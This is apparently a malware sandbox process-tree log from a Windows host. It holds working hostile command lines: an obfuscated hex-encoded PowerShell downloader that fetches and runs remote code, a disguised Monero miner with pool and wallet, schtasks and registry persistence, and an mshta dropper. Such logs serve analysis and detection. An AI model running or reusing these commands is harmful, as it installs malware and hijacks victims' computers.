        C:\Users\Admin\AppData\Local\Temp\fxvscj3d.z15\bumperWW1.exe
        
        C:\Users\Admin\AppData\Local\Temp\fxvscj3d.z15\bumperWW1.exe
        10⤵
        
        PID:668
        
        C:\Users\Admin\Documents\JDBiDv4ME0xGTw5mliDBpD6Z.exe
        
        "C:\Users\Admin\Documents\JDBiDv4ME0xGTw5mliDBpD6Z.exe"
        11⤵
        
        PID:9056
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SOS='24#4e#61#6e#6f#3d#27#4a#4f#4f#45#58#27#2e#72#65#70#6c#61#63#65#28#27#4a#4f#4f#27#2c#27#49#27#29#3b#73#61#6c#20#4f#59#20#24#4e#61#6e#6f#3b#64#6f#20#7b#24#70#69#6e#67#20#3d#20#74#65#73#74#2d#63#6f#6e#6e#65#63#74#69#6f#6e#20#2d#63#6f#6d#70#20#67#6f#6f#67#6c#65#2e#63#6f#6d#20#2d#63#6f#75#6e#74#20#31#20#2d#51#75#69#65#74#7d#20#75#6e#74#69#6c#20#28#24#70#69#6e#67#29#3b#24#70#32#32#20#3d#20#5b#45#6e#75#6d#5d#3a#3a#54#6f#4f#62#6a#65#63#74#28#5b#53#79#73#74#65#6d#2e#4e#65#74#2e#53#65#63#75#72#69#74#79#50#72#6f#74#6f#63#6f#6c#54#79#70#65#5d#2c#20#33#30#37#32#29#3b#5b#53#79#73#74#65#6d#2e#4e#65#74#2e#53#65#72#76#69#63#65#50#6f#69#6e#74#4d#61#6e#61#67#65#72#5d#3a#3a#53#65#63#75#72#69#74#79#50#72#6f#74#6f#63#6f#6c#20#3d#20#24#70#32#32#3b#24#61#61#3d#27#77#68#65#78#2d#4f#62#68#65#78#6a#65#27#3b#24#6c#6c#3d#27#28#27#27#68#68#65#78#74#74#68#65#78#70#73#3a#68#65#78#2f#68#65#78#68#65#78#2f#6d#61#6e#6f#72#61#6b#75#73#2e#74#6f#70#2f#50#30#57#33#52#31#2f#49#4e#2e#50#4e#47#27#27#29#27#3b#20#24#62#62#3d#27#63#68#65#78#74#20#4e#65#68#65#78#68#65#78#74#2e#57#68#65#78#68#65#78#68#65#78#68#65#78#68#65#78#65#27#3b#20#24#66#66#3d#27#6c#6f#68#65#78#68#65#78#61#64#68#65#78#68#65#78#68#65#78#68#65#78#68#65#78#53#27#3b#20#24#68#68#3d#27#74#68#65#78#68#65#78#72#69#68#65#78#68#65#78#68#65#78#6e#67#27#3b#20#24#63#31#3d#27#28#68#65#78#68#65#78#4e#68#65#78#68#65#78#68#65#78#68#65#78#65#27#3b#20#24#63#63#3d#27#62#43#68#65#78#68#65#78#68#65#78#6c#69#65#68#65#78#68#65#78#68#65#78#6e#74#27#3b#20#24#64#64#3d#27#29#2e#44#6f#68#65#78#68#65#78#68#65#78#68#65#78#77#68#65#78#68#65#78#68#65#78#68#65#78#68#65#78#6e#27#3b#20#24#52#4f#4f#4d#3d#28#24#63#31#2c#24#61#61#2c#24#62#62#2c#24#63#63#2c#24#64#64#2c#24#66#66#2c#24#68#68#2c#24#6c#6c#20#2d#4a#6f#69#6e#20#27#27#29#3b#24#52#4f#4f#4d#3d#24#52#4f#4f#4d#2e#72#65#70#6c#61#63#65#28#27#68#65#78#27#2c#20#27#27#29#3b#20#4f#59#20#24#52#4f#4f#4d#7c#4f#59#3b';Invoke-Expression (-join ($SOS -split '#' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) }))
        12⤵
        
        PID:9732
        
        C:\Users\Admin\Documents\2bLelwCXFQRQ3Tq_Kx4q6Tcf.exe
        
        "C:\Users\Admin\Documents\2bLelwCXFQRQ3Tq_Kx4q6Tcf.exe"
        11⤵
        
        PID:8288
        
        C:\Users\Admin\Documents\en0brjHEJZhENHSEk30lKZSB.exe
        
        "C:\Users\Admin\Documents\en0brjHEJZhENHSEk30lKZSB.exe"
        11⤵
        
        PID:8636
        
        C:\Users\Admin\Documents\UMTgoXVwz3LtIzI2Tpdww8zI.exe
        
        "C:\Users\Admin\Documents\UMTgoXVwz3LtIzI2Tpdww8zI.exe"
        11⤵
        
        PID:7848
        
        C:\Users\Admin\Documents\FEwX8l8WkExNSMeJ9Uj_UmVg.exe
        
        "C:\Users\Admin\Documents\FEwX8l8WkExNSMeJ9Uj_UmVg.exe"
        11⤵
        
        PID:4820
        
        C:\Users\Admin\Documents\FEwX8l8WkExNSMeJ9Uj_UmVg.exe
        
        "C:\Users\Admin\Documents\FEwX8l8WkExNSMeJ9Uj_UmVg.exe"
        12⤵
        
        PID:9296
        
        C:\ProgramData\Stub.exe
        
        "C:\ProgramData\Stub.exe"
        12⤵
        
        PID:9528
        
        C:\Users\Admin\AppData\Local\DriverAudioOption.exe
        
        "C:\Users\Admin\AppData\Local\DriverAudioOption.exe"
        13⤵
        
        PID:2824
        
        C:\Users\Admin\AppData\Local\Temp\IntilizateComponentFord.exe
        
        "C:\Users\Admin\AppData\Local\Temp\IntilizateComponentFord.exe"
        13⤵
        
        PID:7404
        
        C:\Users\Admin\Documents\W_hndwM0K_N5Ir0SeZtcZu1p.exe
        
        "C:\Users\Admin\Documents\W_hndwM0K_N5Ir0SeZtcZu1p.exe"
        11⤵
        
        PID:8692
        
        C:\Users\Admin\Documents\vcs1tNqWsznqEHbWpHqiruqd.exe
        
        "C:\Users\Admin\Documents\vcs1tNqWsznqEHbWpHqiruqd.exe"
        11⤵
        
        PID:8188
        
        C:\Users\Admin\Documents\On5CZGeWVdAdYS_NuT3GO10N.exe
        
        "C:\Users\Admin\Documents\On5CZGeWVdAdYS_NuT3GO10N.exe"
        11⤵
        
        PID:8916
        
        C:\Users\Admin\Documents\DSOKvcjyQDoH1_8h_f4KQxHC.exe
        
        "C:\Users\Admin\Documents\DSOKvcjyQDoH1_8h_f4KQxHC.exe"
        11⤵
        
        PID:2528
        
        C:\Users\Admin\Documents\DSOKvcjyQDoH1_8h_f4KQxHC.exe
        
        "C:\Users\Admin\Documents\DSOKvcjyQDoH1_8h_f4KQxHC.exe"
        12⤵
        
        PID:6868
        
        C:\Users\Admin\Documents\OO6IurvswzlgkGWrr8H2054a.exe
        
        "C:\Users\Admin\Documents\OO6IurvswzlgkGWrr8H2054a.exe"
        11⤵
        
        PID:8900
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C taskkill /F /PID 8900 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\OO6IurvswzlgkGWrr8H2054a.exe"
        12⤵
        
        PID:4964
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /PID 8900
        13⤵
        Kills process with taskkill
        
        PID:8728
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C taskkill /F /PID 8900 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\OO6IurvswzlgkGWrr8H2054a.exe"
        12⤵
        
        PID:5976
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /PID 8900
        13⤵
        Kills process with taskkill
        
        PID:6536
        
        C:\Users\Admin\Documents\zguUXhXtTEoTIsNXXhD5cR4n.exe
        
        "C:\Users\Admin\Documents\zguUXhXtTEoTIsNXXhD5cR4n.exe"
        11⤵
        
        PID:8892
        
        C:\Users\Admin\Documents\bxgrUbWCtRx73_DWGjugj3hx.exe
        
        "C:\Users\Admin\Documents\bxgrUbWCtRx73_DWGjugj3hx.exe"
        11⤵
        
        PID:3628
        
        C:\Users\Admin\Documents\MRhx7oeqEZQKIpUr4j_6_nZ_.exe
        
        "C:\Users\Admin\Documents\MRhx7oeqEZQKIpUr4j_6_nZ_.exe"
        11⤵
        
        PID:3420
        
        C:\Users\Admin\Documents\hG_4GVL3QU953ONKKhYeY3VX.exe
        
        "C:\Users\Admin\Documents\hG_4GVL3QU953ONKKhYeY3VX.exe"
        11⤵
        
        PID:8884
        
        C:\Users\Admin\Documents\PmoiJ2Y6T4nxSXQDppDndKB6.exe
        
        "C:\Users\Admin\Documents\PmoiJ2Y6T4nxSXQDppDndKB6.exe"
        11⤵
        
        PID:5252
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbScRIpt: CloSE ( CReATEobJECT ( "WscrIpt.SheLL").Run( "cmD.exe /Q /c TYPE ""C:\Users\Admin\Documents\PmoiJ2Y6T4nxSXQDppDndKB6.exe"" > X4d4XArNWDu.eXE&& StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV & if """"== """" for %A IN (""C:\Users\Admin\Documents\PmoiJ2Y6T4nxSXQDppDndKB6.exe"" ) do taskkill /f -im ""%~nxA"" " , 0, trUE ) )
        12⤵
        
        PID:7288
        
        C:\Users\Admin\Documents\FP04bfDJErfykDeufEoXOhiK.exe
        
        "C:\Users\Admin\Documents\FP04bfDJErfykDeufEoXOhiK.exe"
        11⤵
        
        PID:3468
        
        C:\Users\Admin\Documents\03vomNZr6_EHqFzytm0NImkL.exe
        
        "C:\Users\Admin\Documents\03vomNZr6_EHqFzytm0NImkL.exe"
        11⤵
        
        PID:8880
        
        C:\Users\Admin\Documents\Op2jatWs4CleqYx1VMoKKMCB.exe
        
        "C:\Users\Admin\Documents\Op2jatWs4CleqYx1VMoKKMCB.exe"
        11⤵
        
        PID:8868
        
        C:\Windows\SysWOW64\dllhost.exe
        
        dllhost.exe
        12⤵
        
        PID:5724
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c cmd < Nobile.docm
        12⤵
        
        PID:4716
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd
        13⤵
        
        PID:5552
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /R "^mFzuIhvmvbdHpfegBQvdRBWtkZruqmiMQZvPfzkmbfdsclZwZBnIIvmXJgVJldnWdERlThYiFXSCkFJqZwimwmrxmnuwnBfiQxqRzPi$" Vederlo.docm
        14⤵
        
        PID:9384
        
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Rimasta.exe.com
        
        Rimasta.exe.com J
        14⤵
        
        PID:10020
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping localhost
        14⤵
        Runs ping.exe
        
        PID:9340
        
        C:\Users\Admin\Documents\OF6a2figKJCbCDDcMRG8a9kA.exe
        
        "C:\Users\Admin\Documents\OF6a2figKJCbCDDcMRG8a9kA.exe"
        11⤵
        
        PID:8860
        
        C:\Users\Admin\Documents\OF6a2figKJCbCDDcMRG8a9kA.exe
        
        "C:\Users\Admin\Documents\OF6a2figKJCbCDDcMRG8a9kA.exe"
        12⤵
        
        PID:3392
        
        C:\Users\Admin\Documents\OF6a2figKJCbCDDcMRG8a9kA.exe
        
        "C:\Users\Admin\Documents\OF6a2figKJCbCDDcMRG8a9kA.exe"
        12⤵
        
        PID:5596
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun150d896340a863.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4104
    - - C:\Users\Admin\AppData\Local\Temp\7zS8E21D034\Sun150d896340a863.exe
        
        Sun150d896340a863.exe
        5⤵
        Executes dropped EXE
        
        PID:3228
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im Sun150d896340a863.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS8E21D034\Sun150d896340a863.exe" & del C:\ProgramData\*.dll & exit
        6⤵
        
        PID:5252
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im Sun150d896340a863.exe /f
        7⤵
        Kills process with taskkill
        
        PID:4668
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        7⤵
        Delays execution with timeout.exe
        
        PID:4712
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun15d8dfe2c6d17.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5100
    - - C:\Users\Admin\AppData\Local\Temp\7zS8E21D034\Sun15d8dfe2c6d17.exe
        
        Sun15d8dfe2c6d17.exe
        5⤵
        Executes dropped EXE
        
        PID:4208
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun15223697c98.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1448
    - - C:\Users\Admin\AppData\Local\Temp\7zS8E21D034\Sun15223697c98.exe
        
        Sun15223697c98.exe
        5⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:4252
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun157ff8e4440aa.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1520
    - - C:\Users\Admin\AppData\Local\Temp\7zS8E21D034\Sun157ff8e4440aa.exe
        
        Sun157ff8e4440aa.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3196
      - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        6⤵
        Executes dropped EXE
        
        PID:2372
        
        C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
        7⤵
        Executes dropped EXE
        
        PID:3980
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        8⤵
        
        PID:3992
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        9⤵
        Creates scheduled task(s)
        
        PID:1208
        
        C:\Users\Admin\AppData\Roaming\services64.exe
        
        "C:\Users\Admin\AppData\Roaming\services64.exe"
        8⤵
        
        PID:6116
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        9⤵
        
        PID:6500
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        10⤵
        Creates scheduled task(s)
        
        PID:7144
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        9⤵
        
        PID:7352
        
        C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
        9⤵
        
        PID:8492
        
        C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
        
        "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4076
        
        C:\ProgramData\3883238.exe
        
        "C:\ProgramData\3883238.exe"
        8⤵
        
        PID:3848
        
        C:\ProgramData\1534734.exe
        
        "C:\ProgramData\1534734.exe"
        8⤵
        
        PID:4636
        
        C:\ProgramData\526294.exe
        
        "C:\ProgramData\526294.exe"
        8⤵
        
        PID:5560
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4576
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 4576 -s 1504
        8⤵
        Program crash
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5096
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        7⤵
        Executes dropped EXE
        
        PID:4660
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4660 -s 804
        8⤵
        Program crash
        
        PID:2764
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4660 -s 828
        8⤵
        Program crash
        
        PID:4692
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4660 -s 856
        8⤵
        Program crash
        
        PID:3468
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4660 -s 876
        8⤵
        Program crash
        
        PID:2376
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4660 -s 1012
        8⤵
        Program crash
        
        PID:4728
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4660 -s 1080
        8⤵
        Program crash
        
        PID:3340
        
        C:\Users\Admin\AppData\Local\Temp\udptest.exe
        
        "C:\Users\Admin\AppData\Local\Temp\udptest.exe"
        7⤵
        Executes dropped EXE
        
        PID:2972
        
        C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        7⤵
        Executes dropped EXE
        
        PID:4724
        
        C:\Users\Admin\AppData\Local\Temp\is-T9QNE.tmp\setup_2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-T9QNE.tmp\setup_2.tmp" /SL5="$10200,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:5028
        
        C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        9⤵
        
        PID:4528
        
        C:\Users\Admin\AppData\Local\Temp\is-N467E.tmp\setup_2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-N467E.tmp\setup_2.tmp" /SL5="$501EC,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        10⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2764
        
        C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe"
        7⤵
        Executes dropped EXE
        
        PID:648
        
        C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
        8⤵
        
        PID:416
        
        C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
        
        "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
        7⤵
        Executes dropped EXE
        
        PID:4276
        
        C:\Users\Admin\AppData\Local\Temp\8.exe
        
        "C:\Users\Admin\AppData\Local\Temp\8.exe"
        7⤵
        
        PID:3320
        
        C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        8⤵
        
        PID:4240
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\SoftID\xender.bat" "
        9⤵
        
        PID:5816
        
        C:\Users\Admin\AppData\Roaming\SoftID\inupda.exe
        
        inupda.exe
        10⤵
        
        PID:6088
        
        C:\Users\Admin\AppData\Roaming\SoftID\inupda.exe
        
        inupda.exe
        11⤵
        
        PID:992
        
        C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"
        12⤵
        
        PID:3984
        
        C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"
        13⤵
        
        PID:5408
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e0171c4c73\
        14⤵
        
        PID:5892
        
        C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e0171c4c73\
        15⤵
        
        PID:972
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe" /F
        14⤵
        Creates scheduled task(s)
        
        PID:5136
        
        C:\Users\Admin\AppData\Roaming\SoftID\FoxyIDM621d.exe
        
        FoxyIDM621d.exe
        10⤵
        
        PID:5140
        
        C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp" -d "C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\"
        11⤵
        
        PID:5448
        
        C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4760
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun1584240df9fe73a3.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3468
    - - C:\Users\Admin\AppData\Local\Temp\7zS8E21D034\Sun1584240df9fe73a3.exe
        
        Sun1584240df9fe73a3.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4228
      - C:\ProgramData\5047182.exe
        
        "C:\ProgramData\5047182.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2792
      - C:\ProgramData\737992.exe
        
        "C:\ProgramData\737992.exe"
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:3836
        
        C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
        
        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
        7⤵
        
        PID:3292
      - C:\ProgramData\1271845.exe
        
        "C:\ProgramData\1271845.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:3232
        
        C:\ProgramData\1271845.exe
        
        "C:\ProgramData\1271845.exe"
        7⤵
        Executes dropped EXE
        
        PID:3316
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 892
        7⤵
        Program crash
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4036
      - C:\ProgramData\1650891.exe
        
        "C:\ProgramData\1650891.exe"
        6⤵
        Executes dropped EXE
        
        PID:3296
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun150faeb3537d.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3600
    - - C:\Users\Admin\AppData\Local\Temp\7zS8E21D034\Sun150faeb3537d.exe
        
        Sun150faeb3537d.exe
        5⤵
        Executes dropped EXE
        Modifies system certificate store
        Suspicious use of AdjustPrivilegeToken
        
        PID:4008
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        6⤵
        
        PID:2220
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        7⤵
        Kills process with taskkill
        
        PID:972
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun157a449716c8ee483.exe /mixone
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3708
    - - C:\Users\Admin\AppData\Local\Temp\7zS8E21D034\Sun157a449716c8ee483.exe
        
        Sun157a449716c8ee483.exe /mixone
        5⤵
        Executes dropped EXE
        
        PID:4248
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4248 -s 656
        6⤵
        Drops file in Windows directory
        Program crash
        Suspicious use of AdjustPrivilegeToken
        
        PID:4272
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4248 -s 672
        6⤵
        Program crash
        
        PID:4848
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4248 -s 656
        6⤵
        Program crash
        
        PID:3952
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4248 -s 888
        6⤵
        Program crash
        
        PID:5012
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4248 -s 964
        6⤵
        Program crash
        
        PID:5736
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4248 -s 1100
        6⤵
        Program crash
        
        PID:5868

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:4244
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:1568

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3320

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:6108
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:6124

C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
1⤵
PID:5520
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  PID:6920

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:4800

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:6320

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:6316
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 73D1DAF73BB8EE324B507C376053D8F1 C
  2⤵
  PID:4340
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding D18D89221C112E70C38B2D6336A2D45C
  2⤵
  PID:7676
- - C:\Windows\SysWOW64\taskkill.exe
    "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
    3⤵
    - Kills process with taskkill
    PID:8220

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6264

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:2756
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:5732

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8092

C:\Users\Admin\AppData\Local\Temp\F1B4.exe
C:\Users\Admin\AppData\Local\Temp\F1B4.exe
1⤵
PID:8924

C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
1⤵
PID:5188
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  PID:9912

C:\Users\Admin\AppData\Local\Temp\4D71.exe
C:\Users\Admin\AppData\Local\Temp\4D71.exe
1⤵
PID:8772

C:\Users\Admin\AppData\Local\Temp\7CB0.exe
C:\Users\Admin\AppData\Local\Temp\7CB0.exe
1⤵
PID:10196

